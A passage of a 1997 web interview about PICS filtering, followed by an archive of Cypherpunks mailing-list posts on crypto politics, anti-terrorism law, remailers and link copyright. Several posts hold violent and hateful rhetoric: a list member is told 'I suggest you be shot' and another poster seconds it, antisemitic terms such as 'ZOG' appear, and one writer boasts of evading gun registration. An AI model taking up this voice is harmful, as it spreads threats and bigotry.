      libraries may have requirements placed upon them
      by their constituencies or by the law with respect
      to illegal materials; it is up to the libraries,
      their constituencies, and governments to
      appropriately resolve these concerns.
   2. I personally like the direction the EFF took in
      working on "Public Interest Principles for Online
      Filtration, Ratings and Labelling Systems" and
      hope to see such efforts continue. The W3C feels
      that metadata is necessary to the Web. Hence, I
      think it is somewhat naive to criticize the
      capability to support metadata. While I do not
      agree with every position in the EFF document, I
      liked it because I think it is more constructive
      to discuss how that metadata infrastructure can be
      best used (or how to prevent abuse) rather than
      trying to hobble the Web.
   3. I, and my colleagues at the W3C, encourage
      rigorous discussion on the use of filtering
      technologies and how they affect individuals'
      rights. I do not buy the slippery slope argument
      that all technology which governments could use to
      do "bad things" must not be developed.

 I do not see PICS in grand terms; PICS is an
 application of metadata, as I explain elsewhere. To
 respond to the later question I do prefer the
 capability to exclude unwanted speech over the
 suppression of it at its source. Also, metadata itself
 is speech -- having the capability to laud, critique
 and criticize others is fundamental to a robust
 society.

 ILPN: How likely is it that PICS-based software will be
 mandated by governments at the level of ISPs?

 Unknown. Also, governments could theoretically do a
 number of things such as :

    * create rating systems
    * determine filtering criteria
    * require the use of filtering technology in servers
      or in clients
    * require the use of certain rating systems, etc.

 They can accomplish this by legislative action, by
 interpreting existing statutes, by promoting
 self-regulatory structures, or by providing incentives
 to comply with the policies by attaching liability, or
 removing it, to the players involved. Even with a
 specific question in hand, it would be a difficult task
 to predict the path of any nation.

 ILPN: Are you concerned with the potential abuse of
 PICS by governments and/or employers?

 Yes. I personally would protest or subvert my
 employer's or government's efforts in applying
 mandatory filters against my will; I do use filters to
 select content I am interested in and to get rid of
 spam and bozos. Regardless of my personal opinion, the
 W3C does not have the competency to tell other
 organizations what their policies should be. We can
 tell them about the technology and consequences of its
 use, but what they do with it is their choice
 obviously.

 ILPN: What about the possibility that a third-party
 labeling organization will obtain too much power?

 In terms of an independent third party? Let the market
 decide. If there are monopolistic concerns, a nation
 may wish to apply anti-trust laws. If it is a political
 entity, I hope it has some mechanism for being held
 accountable to its constituency.

 ILPN: We tend to think of PICS in terms of excluding
 materials deemed offensive. What are more 'positive'
 possible applications of PICS?

 PICS is merely one application of "metadata." Metadata
 means "data about data" and we are working very hard on
 this with our Resource Description Framework (RDF).
 This is a fundamental computer science concept and is
 essential to the future of the Web. Any time you wish
 to make a statement or an assertion, to rely upon a
 trusted opinion, it is "metadata." Our Platform for
 Privacy Preferences (P3) is another application of
 metadata. We wish to enable sites to make statements
 about their privacy practices so users are informed and
 can make choices about how they wish to interact with
 sites. A useful feature of metadata is that it is can
 be machine readable, so agents can act on behalf of the
 user, freeing the user to concentrate on higher order
 content and interactions. Hence, when I configure my
 agent, I should be able to search Web sites with the
 type of content I like, those which have privacy
 practices that I like, or that are referred to me by
 trusted third parties, and those that support the
 payment capabilities that I posses.

 ILPN: PICS seems to transform the web from an arena in
 which anything goes, and in which each individual must
 define his or her own participation, to an arena in
 which various 'cultures' can establish their own,
 separately designed comfort zones. Was this an
 intention of the PICS developers, or is it simply an
 unintended consequence of an effort to protect
 children?

 I don�t know if this was an original, explicit
 intention of PICS, but it soon became apparent that
 this is what PICS was about: allowing people to create
 their own cultural boundaries on the Web. I look at a
 lot of what we do at the W3C as not only providing the
 basic infrastructure for exchanging hyperlinked
 documents, but we are providing the capability to have
 more sophisticated interactions with other users and
 agents on the Web -- homegrown cultures and societies.
 "Real world" entities may see these tools as ways of
 extending their own social structure onto the Web, and
 this is actually what a lot of the PICS debate is about
 in my opinion. We'll see how successful governments can
 be.

 In the meantime, the W3C does want to mitigate the
 possible fragmentation on the Web from either: 1)
 people dropping off it all together and creating their
 own, or 2) tearing it apart from fighting over whose
 cultural norms should prevail. I'll quote from the W3C
 Policy Statement on this point:

      ...This architecture must allow local
      policies to co-exist without cultural
      fragmentation or domination...

      http://www.w3.org/Policy/statement.html

 ILPN: Is W3C promoting the development of PICS into
 proxy server products?

 Yes. The PICS Options FAQ states that filter processing
 can be centralized at a proxy server while still
 permitting individuals to choose the filtering rules. I
 will qualify this by saying that it has never been the
 intent of the W3C to create technology for governments
 to use as a means of centralized control. Not that
 governments couldn't do such a thing (and there are
 other ways for them to do it if they wanted to), but
 that isn't our intent in working on this technology.

 ILPN:. What kind of legislation, and court cases, do
 you expect to see in the future regarding PICS?

 I expect to see continued activity in:

   1. drawing the line between "illegal" and
      "inappropriate" content
   2. determining what obligations services have in
      restricting illegal material
   3. developing self regulatory structures for limiting
      childrens' access to "inappropriate" material�
      (promoting a "family friendly internet.")

 ILPN: What should people maintaining web sites be doing
 regarding PICS and the various rating systems? Should
 people be rating their sites now? What might the
 consequences be for neglecting to rate one's site? Is
 it important for people to keep track of how their web
 sites are rated, and if so, how can they do this?

 Technologies, such as Microsystems Software's
 CyberLabeler, are being developed which follow the
 recommendations of the PICS specifications and make
 labeling sites much easier. Content creators that want
 to label should continue to demand such technologies
 and that such technologies be integrated into Web
 development applications. I expect that in the near
 future, many sites will be generated dynamically from
 databases; those databases will be indexed and
 structured by metadata. At which point, labels and
 rating will be integral to the creation of dynamic,
 customized sites. Search engines may also begin relying
 upon the useful information found in metadata to return
 more appropriate -- on "target" -- information to
 users.

 The consequence of not rating your site might be that
 if you have potentially illegal or offensive material
 you may draw regulatory attention upon yourself. Also,
 by not labeling you may be overlooked by those using
 filtering and content selection technologies. Most
 adult sites are more than happy to label and use
 filtering services, they want to attract those looking
 for the services they offer� while avoiding the
 difficulties associated with angry parents.

 ILPN:Thank you for your time.

 My pleasure.

Send us your comments on this article

Copyright 1997. All Rights Reserved

f r o n t  p a g e  |  a b o u t  |  b a c k  i s s u e s  |  s u b s c r i
b e  |  a d v e r t i s e






From tcmay at got.net  Tue Aug 19 10:13:08 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 01:13:08 +0800
Subject: It's Official...
In-Reply-To: 
Message-ID: 



At 7:39 AM -0700 8/19/97, Robert Hettinga wrote:

>                  The newly identified disorder will
>                  be dubbed Pathological Internet Use  Fatal
>                  (PIU) and will be christened during

Well, I don't know about the "Fatal" part, as I haven't died yet.

The rest of the description seems to accomplish the goals of the mental
health profession, namely, to extend their empire a bit and get more
revenue from insurers and corporations. Nothing surprising there.

Maybe what they mean by "Pathological Internet Use Fatal" is that heavy
users of the Internet, and readers of Cypherpunks and  Militia Times become
fatal to others, like those who try to raid their homes clad in black Nomex
ninja warrior suits?

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Tue Aug 19 10:36:12 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 01:36:12 +0800
Subject: Cypherpunks as a Terrorist Organization
In-Reply-To: 
Message-ID: 



At 8:02 AM -0700 8/19/97, Duncan Frissell wrote:

>State is lagging in issuing the terrorist organization list required by this
>law.  It is believed that they are chicken because most of the groups would
>be Moslem groups and this would be considered a politically incorrect
>denigration of a "protected group."  Then they'd have to put the IRA on the
>list as well and that would cause controversy.  If they never issue the
>list...
>
>In any case, I don't think that we have to worry because we don't fund
>anyone.  We just send non-cash bits.  The law requires that a foreign
>terrorist group on the "Attorney General's List" (actually State Department)
>receive money or physical support.  I suppose remailers could be targetted
>but that would make for an interesting case since anonymnity remains
>protected.

Actually, this is not true. I guess it depends on who the "we" is/are. I've
made contributions to groups whose goals I support. And several years ago I
helped some political groups get PGP 2.0 installed for use. (They can now
find experts within their own group, as I am hardly current on PGP and its
many variations and installation options. But in '92-'93 I was a local
expert, comparatively.)

It bears mentioning that the "rebel group" in Myanmar/Burma which Phil
Zimmermann is so proud of, becauase they were early users of PGP to protect
their communications and laptops, is both a terrorist and a drug dealing
group. As the rebels battle the forces of Slorc, the regime in power, they
fund their activities with the thriving heroin trade out of the Shan
province. And they ambush Slorc vehicles and kill the soldiers inside,
plant bombs in strategic locations, etc. No different from Hamas freedom
fighters bombing ZOG installations in the Zionist Entity.

And Hamas is now using PGP, frustrating the ZOG and Palestinian Authority
officials to no end. The Engineer, now presumed dead, is thus replaced by
The Cryptologist.

So, when PGP supporters claim that PGP is not being used for "terrorist
activities," they are ignoring reality. Depends on a definition of
terrorism, as always. When the U.S. mines the harbors of countries with
democratically elected governments, or assassinates Patrice Lumumba, Ahmed
Ben Bella, etc., this is called "fighting for democracy." When the
U.S.-backed Cuban emigre terrorist groups blow up planes out of Havana,
this is called "freedom fighting."

When Hamas stages similar acts, it is "terrorism."

So, if PGP supporters help the Burmese rebels to set up secure networks, is
this legal or illegal under the Anti-Terrorism Act? And if PGP supporters
help Hamas set up secure networks, is this legal or illegal?

Exactly what is the difference?

Clinton's Anti-Terrorism Act leaves it unclear which of these actions we
citizen units are allowed to express support, financial, moral, or
technical, for.

Fuck them. They are the real terrorists.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From apache at bear.apana.org.au  Tue Aug 19 10:45:02 1997
From: apache at bear.apana.org.au (Apache)
Date: Wed, 20 Aug 1997 01:45:02 +0800
Subject: It's Official...
In-Reply-To: 
Message-ID: 



On Tue, 19 Aug 1997, Robert Hettinga wrote:

>                                                        We're Becoming
>                   The term is being coined by Dr.      Cyber
>                   Kimberly Young, an assistant         Junkies--Electronic
>                   professor of psychology at the       Engineering
>                   University of Pittsburgh at          Times
>                   Bradford, in Bradford, Pa. With her
>                   paper's presentation, the APA will
>                   classify excessive Internet use as

Typical tactics by qwacks impersonating scientific researchers. Invent a
new mental ailment and cash in on insurance. I'll stick to entrail
readers.







From tcmay at got.net  Tue Aug 19 10:59:27 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 01:59:27 +0800
Subject: Cypherpunks as a Terrorist Organization
In-Reply-To: 
Message-ID: 



At 9:00 AM -0700 8/19/97, Trevor Goodchild wrote:

>Hey Tim, speaking of DejaNews, how soon do you think it will be before
>there is a Ministry of Truth (minitru) in place to correct incorrect
>postings of the past, to update them a bit and airbrush out those who, um,
>never existed?

As a matter of fact, I expect there have already been actions demanding
that DejaNews purge their data bases of some posting or another. After all,
they are truly a form of "eternity server."

(I don't mean "no archive," I mean cases where Individual A or Company B
finds something they don't like--libel, trade secrets, whatever--and
demands that references be expunged.)

And on the Cypherpunks list, we saw a similar rewriting of history. Once
the censor decided that any posts critical of a certain company's security
products were not to be allowed on the censored list, then he had to block
posts which even _referenced_ this act of censorship. Such has it always
been with censors, such shall it always be.

....
>No bigger a threat than the HUAC saw those who didn't believe the Hoover
>vision.  Nothing's really changed since then other than the faces and the
>names.  The issues remain.

Indeed, the HUAC has effectively been reconstituted. For PR and
administrative reasons, it is no longer the House UnAmerican Activities
Committee. No political mileage in such a form. And lots of PR downside.
But it's still there, of course. The Four Horsemen: Terrorists, Drug
Dealers, Pornographers, and Money Launderers. These are invoked to pass
more draconial laws and to imprison dissidents.

...
>> and will open fire. (A Sheriff's Deputy once told me that even saying I
>> would defend my home against unwelcome intruders constituted a "threat"
>and
>> that he might order a detachment to visit my compound. So far, two years
>> later, he hasn't made good on _his_ threat. And now I'm more ready for
>him
>> than ever.)
>
>A theat to him perhaps.  What ever happened to self defense I wonder?

It's been very tough for many years to win a case of killing police based
on "self defense" arguments. Had Abner Louima tried to shoot his sodomizers
they would have just drawn down on him and zapped him. It then wouldn't
have even made the news, except on page 17.

(And had he died during his toilet plunger experience, they'd have shot
him, then planted a piece on him. Case closed.)


>Congress was indeed a horrid idea.  We need no laws other that "do what
>you will as long as you don't physically injure, or steal."  All else is
>congressional bullshit paid in bloody tax money.

Amen, brother.


>My parents having left a socialist state (read fascist) for freedom, I
>find freedom fleeting.  The same scum that ran the communist block are
>here running our country.  Sure they were born here, but their spirit and
>beliefs are the same as the scum that were in power in the old country.

Indeed. And much more basic than "left" vs. "right" are the usual issues of
control" those in power want to stay in power and want to extend their
power. The alleged "leftists" (communists, socialists) in power in Eastern
Europe and the U.S.S.R. were of course not leftists first and foremost.
They were just the leaders, the gangleaders, the company presidents, of the
monopoly force. (No time for a political discussion, but both fascism and
communism, as practiced this century, are cases of a "corporate state,"
with the corporation = the state. As Mussolini said, "fascism is
corporatism.")

>How soon before they stop teaching highschool kids about the revolution
>for fear it will happen again?  How soon before they edit the constitution
>and pretend it was always that way?  How soon before we'll need passports
>to travel between one part of the country and another?  Between one 'burb
>to another?

Well, I graduated from a pretty good high school in Fairfax County,
Virginia, a suburb of D.C., in 1970. Even by the time I took U.S. history
in 1968 or so, more time was spent discussing "Crispus Attuck," the noble
black man who fought in some battle in Boston or Lexington or somesuch,
than in discussing the Founder's warnings that a revolution would probably
have to be fought again in a generation (20 years).  It seems that
discussing the "relevance" (a totemic word back in '68) of the American
Revolution to the lives of blacks and to the assassination of Martin Luther
King, Jr. was more important than exploring what the Revolution really
means to the struggle against central authoritarian governments.

So, if my high school was teaching this crap almost 30 years ago, I can
only imagine what time has done.


>knife and fork and other sharp objects? How soon before night curfews?

Many communities have night curfews. I got into a heated discussion here in
Santa Cruz, California, when I said on a local newsgroup that my son had
been instructed to ignore the illegal restriction on his movements, and
that if he was arrested he should expect to sit in jail, as I was not going
to drive down to the jail and bail him out or sign for him, or whatever.

(I was hoping to get one of those famous calls from "Child Protective
Services," based on this post, so I could tell them to fuck off and watch
the sparks fly. Maybe even get one of their vans pulling into my parking
lot. Alas, no such call. And nearly all the folks in scruz.general who
commented on the issue seemed to agree that curfews are unconstitutional
restrictions on their freedom to decide where their children should be at
various times.)


>They've already silenced us, they've already taken our guns, they've
>already thrown us in jail for feeding others, for speaking, thinking and
>protesting, and demanding privacy, they've already stripped our privacy,
>they've already murdered us, they've already licensed everything we can do
>and can't, they've already filled the streets with jackbooted gun and
>nightstick toting thugs who wear blue and use bathroom plungers as means
>of interrogation.
>
>What next?  And how soon?

They've _tried_ to take our guns, you mean. Here in Kalifornia, something
like 80% of "assault rifle" owners have failed to comply with the laws
requiring registration, licensing, taxes, etc.

(Many of us bought Colt AR-15s and Valmet AK-47 lookalikes in the 1970s and
80s, and made damn sure we bought them at gun shows, for cash. With no
identities being disclosed. These rifles are now the backbone of the
militia movement, and the authorities are basically unwilling to try to
enforce the unconsitutional laws about these "black guns.")

--Tim May, still a felon under their bullshit laws, for which the
politicians will eventually pay a price

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From whgiii at amaranth.com  Tue Aug 19 11:06:12 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Wed, 20 Aug 1997 02:06:12 +0800
Subject: It's Official...
In-Reply-To: 
Message-ID: <199708191755.MAA03771@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on
08/20/97 
   at 03:15 AM, Apache  said:

>On Tue, 19 Aug 1997, Robert Hettinga wrote:

>>                                                        We're Becoming
>>                   The term is being coined by Dr.      Cyber
>>                   Kimberly Young, an assistant         Junkies--Electronic
>>                   professor of psychology at the       Engineering
>>                   University of Pittsburgh at          Times
>>                   Bradford, in Bradford, Pa. With her
>>                   paper's presentation, the APA will
>>                   classify excessive Internet use as

>Typical tactics by qwacks impersonating scientific researchers. Invent a
>new mental ailment and cash in on insurance. I'll stick to entrail
>readers.

Well the field of Psychology is second only Chiropracticy for quacks.

They are filled with wantabe scientist who could not hack it in a real
scientific field.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/nQJY9Co1n+aLhhAQF2yAP+NlhgS+6NPqty7BbjTRTL1Sd3B8DQ/QD2
LRVAnG4CNopVRN/ZBLzZrMQpLAXjHuBvBJYUkIxLnLuPDAMdhlhAXsBURyS1jSYl
yOZEphGiofo9VvbEIwhIsqwkht9NWljIDvGY8dOWW6jgwp1eMjx77NXJ4qnj8MQf
SFixf2cmU3w=
=bbEH
-----END PGP SIGNATURE-----






From tcmay at got.net  Tue Aug 19 11:32:45 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 02:32:45 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: <199708190730.JAA00747@basement.replay.com>
Message-ID: 



At 8:15 AM -0700 8/19/97, Duncan Frissell wrote:

>At 09:30 AM 8/19/97 +0200, Anonymous wrote:
>>  Jim Bell was like manna from heaven for the IRS. It gave them an
>>opportunity to bring down the fascist forces of a wide variety of
>>government agencies to back the IRS's play in this instance.
>>  Bell's persecution was not a mistake, it was a loud and clear
>>message to the taxpaying sheeple that they are "a felon under an
>>increasing number of laws," and that the IRS has a plethora of
>>government agencies ready and willing to join them in fucking
>>over anyone who gets out of line.
>
>It would have turned into a mistake if Bell had had balls to match his mouth.
> The Feds hate to lose prosecutions like this because loses encourage the
>activists in the population to resist.

One lesson, or reminder, I take from the Bell matter is this:

Avoid doing stupid and petty things like using multiple Social Security
numbers, evading taxes, and releasing stink bombs into government (or
other) offices.

 (These are things Bell has pled on, as I recall the transcripts, so
there's little doubt about them. And had he pled not guilty and gone to
trial, apparently the evidence would've convicted him on most of the
charges. Perhaps this is why he pled.)

The constitutional protections for speech, free association, etc. don't
have a lot of use for these charges (unless one can successfully mount a
major, major, earthshattering challenge to the basic constitutionality of
the Income Tax system itself, something which has consistently failed over
the decades).

They got Al Capone for tax evasion, not his other criminal activities. I'm
pretty scrupulous about filing correct tax returns, much as I dislike taxes
in general (and uses to which my taxes are put in particular).

This is because some "tax protestors" have gotten fairly stiff (multi-year)
sentences to Terminal Island, a federal prison in California, for the
"crime" of evading a few tens of thousands of dollars. This while less
vocal, less activist evaders have either been given a chance to settle
(sometimes for nickels on the dollar) their outstanding tax balance, or
have received suspended sentences, or have gone to "country club" prisons
in Pleasanton, Lompoc, etc. (these are the California facilities I'm
familiar with, through news reports, understand).

I don't have much doubt that if the Feds could nail me for a serious
violation of the tax or reporting laws, e.g., if I used multiple SS numbers
in various jobs,  they would. But so long as they can't, they won't.

So, I disagree with Duncan's apparent point that it's too bad the Bell case
didn't go to trial. I'm convinced Bell would have been convicted on most or
all charges. Hardly a test case for anything important.

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From sunder at brainlink.com  Tue Aug 19 11:50:55 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Wed, 20 Aug 1997 02:50:55 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.2.32.19970819090006.0077da04@popd.ix.netcom.com>
Message-ID: 



On Tue, 19 Aug 1997 stewarts at ix.netcom.com wrote:

> Eudora would be an interesting platform if you could convince the
> plug-in to run along with your spam filters and the PGP plug-in
> and have everything done in the right order.  You'd also have the problem
> of putting the right headers on the message - it's nicer if it
> can get a different From: header for remailer mail than for real mail,
> so people who don't like remailer mail can flame you accurately :-)

If I recall correctly, Eudora uses standard mailbox format just like Pine,
Elm and other unix like mailers, so it is possible to write a filter
program that would go through the mailbox file and do stuff for you, such
as stripping away headers.

Here's a question for those that use Eudora: is there a way to have Eudora
run stuff for you on incoming mail?  That is when it goes out and connects
to the POP3 server and downloads the mail, can it launch another
application to munge the new inbox?  

If so, it should be easy enough to take the incoming mail and process it -
say using perl, VB or whatever, and you can probably just append stuff to
the outbox. (Other question, can Eudora be told to send outgoing mail at
certain hours?  If not, you'll have to have the program telnet out for you
to port 25 of the SMTP...)

I've done similar things in Perl (not using Eudora) for the bots that run
my filtered cypherpunks list.  One bot scrounges through my mailbox
looking for admin requests, another sends filtered mail out when enough
has queued up. 

Would be trivial enough to turn them into a remailer by glueing PGP to the
mix.  :) 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From tcmay at got.net  Tue Aug 19 12:40:14 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 03:40:14 +0800
Subject: David Downey asks to be shot
In-Reply-To: <33F99E5C.13D23503@cyberspacetechnologies.com>
Message-ID: 



At 6:23 AM -0700 8/19/97, David D.W.Downey wrote:
>blackjack at hotmail.com wrote:
>
>> Saw your post in the newsgroups.
>>
>> Check this out!
>>
>> http://www.geocities.com/Eureka/Plaza/1022
>
>  Ya know, this shit really pisses me off. I understand that we have to
>protect everyone's rights if we wish are own to be protected. This is a
>classic case of what is causing the mainstream public to hash so hard
>about porn and such. I did nothing to solicit this beyond posting to a
>news group. This troller comes along, scarfs my email address and then
>sends me this email. If you click on the link it sends you to a place to
>sign up for accessing a hard porn site. This is what feeds the initiated
>Johnnie Q.Public's desire to control the net, and endangers all of our
>rights on the net. I understand that we have to protect the enemies'
>rights too, but can't we just shoo a few of them first? Lowers the
>numbers needing protection and might help us out in the end.
>Grrrrrrr!!!!

I agree. We should shoot a few of the enemies first.

I suggest you be shot.


--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From enoch at zipcon.net  Tue Aug 19 13:50:34 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Wed, 20 Aug 1997 04:50:34 +0800
Subject: CPAC Quotes Templeton
Message-ID: <19970819202714.28609.qmail@zipcon.net>



Those of you who have been following the efforts of CPAC and their
associates to render homeless certain web sites which they feel might be
frequented by thought criminals might find the following an interesting
case of "strange bedfellows."

It is apparent that CPAC doesn't like opposing points of view,
particularly when they are seen in public forums hosted by CPAC on the
Web.  Messages which don't toe the CPAC party line mysteriously vanish and
forums are frequently erased in their entirety when anything resembling a
discussion appears.

Now CPAC has claimed some new territory in their war to silence their
critics.  They maintain that no one who does not agree with their agenda
may show a link to any of their publicly available resources on the Web,
and that doing so constitutes theft of their bandwidth. 

They quote as their cite for this concept a piece by Brad Templeton,
ClariNet owner, who apparently shares their view that links can constitute
copyright infringement under certain circumstances.  Fortunately, Brad 
does not restrict linking to the article in question, from which I offer
the following tiny snippet under the "Fair Use" doctrine. 

 > I, and many other people initially had the intuitive feeling that it
 > could never be a violation of copyright to make a link to a web page.
 > Of late, I've come to think that this might be wrong. 
   
Now what CPAC objects to is people who post messages saying, essentially, 

"Look at the silly CPAC people rant and froth.  "

I would suggest that CPAC is a political organization, with a very 
well-defined social agenda, which I have every right to comment on, 
and that illustrative hyperlinks in my commentary constitute "Fair Use"
of their content.

Am I on firm legal ground here?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From tcmay at got.net  Tue Aug 19 13:59:15 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 04:59:15 +0800
Subject: Status of Cypherpunks list sites?
Message-ID: 




I've noticed that the list site name, "cypherpunks at toad.com", is still in
use by many posters. I find it on most of the posts I reply to, and I have
to manually change to one of the three current lists.

Not too long ago I was subscribed to the "cypherpunks at algebra.com" address,
and the list stopped flowing to me for a day or so. I resubbed under
"cypherpunks at cyberpass.net." I noticed that Igor Chudov said he was taking
a hiatus from the Net and lists, so I wondered if this meant his support
for his site was either being dropped or might be subject to more frequent
outages.

Anyway, has anybody been doing any pings of the various lists to see which
ones are  most available and have the lowest latencies for redistribution
to subscribers?

And shouldn't we all be making a more serious effort to drop the use of the
"cypherpunks at toad.com" address, as John said some months back that he would
support forwarding stuff for a while, but not necessarily forever. As it
is, it just adds another hop and another potential weak link.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From whgiii at amaranth.com  Tue Aug 19 14:04:27 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Wed, 20 Aug 1997 05:04:27 +0800
Subject: David Downey asks to be shot
In-Reply-To: 
Message-ID: <199708192043.PAA05812@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/19/97 
   at 12:28 PM, Tim May  said:

>At 6:23 AM -0700 8/19/97, David D.W.Downey wrote:
>>blackjack at hotmail.com wrote:
>>
>>> Saw your post in the newsgroups.
>>>
>>> Check this out!
>>>
>>> http://www.geocities.com/Eureka/Plaza/1022
>>
>>  Ya know, this shit really pisses me off. I understand that we have to
>>protect everyone's rights if we wish are own to be protected. This is a
>>classic case of what is causing the mainstream public to hash so hard
>>about porn and such. I did nothing to solicit this beyond posting to a
>>news group. This troller comes along, scarfs my email address and then
>>sends me this email. If you click on the link it sends you to a place to
>>sign up for accessing a hard porn site. This is what feeds the initiated
>>Johnnie Q.Public's desire to control the net, and endangers all of our
>>rights on the net. I understand that we have to protect the enemies'
>>rights too, but can't we just shoo a few of them first? Lowers the
>>numbers needing protection and might help us out in the end.
>>Grrrrrrr!!!!

>I agree. We should shoot a few of the enemies first.

>I suggest you be shot.


I'll second the motion shall we put it to a vote?? :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/n3fI9Co1n+aLhhAQH3ngP+JgxHSivJFcjxZnFDEyW5fMGRQ1mlk6ti
c/YrkRDkF+uiCjvLO91z/pufLc+C5yi+weNDRZIptmz6TpFgvLQTmV7jOXnizZdH
X801eot7ByDxhTvpnx0VCMWHx0StIl5JhHUau/9VZ3hgn1QtUEKC/u2KlxKSPQSe
hjxEtHBwgb4=
=x5LZ
-----END PGP SIGNATURE-----






From jeffb at issl.atl.hp.com  Tue Aug 19 14:07:19 1997
From: jeffb at issl.atl.hp.com (Jeff Barber)
Date: Wed, 20 Aug 1997 05:07:19 +0800
Subject: CPAC Quotes Templeton
In-Reply-To: <19970819202714.28609.qmail@zipcon.net>
Message-ID: <199708192104.RAA21650@jafar.issl.atl.hp.com>



Mike Duvos writes:

> [Brad Templeton:]
>  > I, and many other people initially had the intuitive feeling that it
>  > could never be a violation of copyright to make a link to a web page.
>  > Of late, I've come to think that this might be wrong. 
>    
> Now what CPAC objects to is people who post messages saying, essentially, 
> 
> "Look at the silly CPAC people rant and froth.  "
> 
> I would suggest that CPAC is a political organization, with a very 
> well-defined social agenda, which I have every right to comment on, 
> and that illustrative hyperlinks in my commentary constitute "Fair Use"
> of their content.
> 
> Am I on firm legal ground here?

If you merely point to someone else's content, I don't see how you
can possibly be found to have violated their copyright.  The "linkee"
site is the one publishing the information guarded by copyright, not
the "linker" ("publish" == to desseminate or make available to the
public).  IMO, you don't even need to cite "fair use" for this;
*you're* not publishing it, they are.  This is just an intimidation
tactic.  (Of course, if they have lawyers and money and motivation,
and you don't, it may very well work.)

BTW, do you have an URL to the Brad Templeton piece?


-- Jeff (IANAL, etc.)






From dformosa at st.nepean.uws.edu.au  Tue Aug 19 14:12:33 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Wed, 20 Aug 1997 05:12:33 +0800
Subject: Cypherpunks as a Terrorist Organization
